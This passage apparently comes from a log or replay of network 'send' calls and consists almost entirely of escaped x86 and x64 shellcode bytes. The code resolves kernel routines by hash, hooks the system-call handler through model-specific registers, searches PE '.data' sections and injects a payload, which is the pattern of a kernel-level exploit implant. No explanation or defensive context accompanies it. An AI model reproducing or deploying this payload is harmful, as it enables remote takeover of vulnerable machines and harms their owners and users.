x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 14, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\
\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00
\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\